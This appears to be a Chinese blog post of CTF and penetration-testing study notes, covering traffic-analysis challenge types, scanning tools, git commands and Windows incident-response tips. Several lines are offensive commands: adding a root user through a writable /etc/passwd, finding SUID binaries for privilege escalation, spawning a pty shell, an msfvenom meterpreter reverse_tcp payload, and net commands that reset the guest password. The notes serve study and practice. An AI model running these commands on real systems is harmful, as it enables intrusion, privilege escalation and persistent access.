我见过的流量分析类型的题目总结:
一,ping 报文信息 (icmp协议)
二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载)
三,sql注入攻击
四,访问特定的加密解密网站(md5,base64)
五,后台扫描+弱密码爆破+菜刀
六,usb流量分析
七,WiFi无线密码破解
八,根据一组流量包了解黑客的具体行为
1.仿射密码,数值3和9
2.渗透第一题在端口后面家robots.txt出来反爬虫协议中有flag
3.让他停下来 查看源代码
4.post请求利用hackbar
5.查看源代码两大串unescape编码解密后按照源代码提示和另一小串解密后的编码拼在一起回来提交得到真flag
6.卡莉操作
目录扫描:
gobustetr
dirsearch
dirb
msf渗透成功后想要查看windows里面的文件需要把文件放在单引号中。
原因:它是使用 的 shell 的近似值Shellwords。
git checkout (branchname) 分支切换。
git log 查看历史提交记录
mktemp -d 在tmp文件夹下创建一个临时目录
tail 命令可用于查看文件的内容,有一个常用的参数 -f 常用于查阅正在改变的日志文件。
vtail -f filename 会把 filename 文件里的最尾部的内容显示在屏幕上,并且不断刷新,只要 filename 更新就可以看到最新的文件内容。
查看当前项目中的所有标签,可以使用以下命令:git tag
如果想查看某个具体标签的信息,可以使用以下命令:git show {标签名}
openssl passwd -1 -salt [盐] [密码] /etc/password 可写
test:x:0:0:root:/root:/bin/bash
用户名:密码:用户 ID ( UID ):组 ID (GID):用户 ID 信息(可不填):主目录:Command/shell
稳定shell生成命令:python -c "import pty;pty.spawn('/bin/sh')"
提权命令:
find / -perm -4000 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;2>/dev/null
sudo -l
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.3 lport=4444 -f raw
在 Linux 中,SUID(执行时设置所有者 userId)是赋予文件的一种特定类型的文件权限。 SUID 向用户授予临时权限,以在文件所有者(而不是运行它的用户)的许可下运行程序/文件。
例如,用于更改密码的二进制文件设置了 SUID 位 (/usr/bin/passwd)。这是因为要更改您的密码;它将需要写入您无权访问的 Shadowers 文件,而 root 可以;因此它具有 root 权限来进行正确的更改。
locate 查找文件位置 好用
windows:
注册表两个run文件
被挂马以后去查找
SAM文件里可以使用权限复用漏洞
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
上面文件夹也可能会存在木马
正常系统应该300+个补丁
但是基本不打或者全打,大多数都是直接上个防护就完了
net use k: \\192.168.1.1\c$
磁盘映射命令 利用445 smb端口进行的需要确保端口打开win10,11默认关闭
net localgroup 组名
可以查看组中的隐藏账户 (账户名带$)
net user 查看用户 看不到隐藏账户
如必须使用用户登陆最好使用其自带用户不要新建
net user guest 12345 用guest用户登陆后用将密码改为12345
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
powershell直接上传命令容易出问题
保存到批处理来执行可以解决这个问题
powershell文件攻击或者内网渗透用的比较多
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
